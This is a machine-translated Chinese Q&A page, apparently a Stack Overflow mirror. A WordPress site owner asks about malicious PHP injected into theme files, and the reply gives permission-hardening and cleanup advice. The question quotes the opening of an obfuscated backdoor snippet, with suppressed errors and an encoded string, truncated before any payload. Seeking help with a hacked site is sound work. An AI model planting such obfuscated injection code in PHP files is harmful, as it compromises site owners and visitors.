我在更新的wordpress网站上获得了此代码。
Wordpress 3.3.1,所有插件都是最新的。
插件列表:custom-contact-forms,google-maps-for-wordpress& SEO-最终
某些主题文件受CHMOD 644的影响,每次我让CHMOD 777这个文件启动,但它不会只影响777个文件,它也会影响644个文件。
代码如下:
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
那么,我该如何防止这种情况,以及代码的作用是什么?
答案 0 :(得分:6)
没有Wordpress文件应该是777;最大权限是755个文件夹,644个文件。见Hardening WordPress « WordPress Codex.
您的托管帐户 - 可能是便宜的共享托管 - 可能是黑客矢量。告诉你的主人;可能找到一个更安全的主机。更改所有密码。扫描您自己的电脑。
要彻底清除WP安装和托管帐户,请参阅FAQ: My site was hacked « WordPress Codex和How to completely clean your hacked wordpress installation以及How to find a backdoor in a hacked WordPress.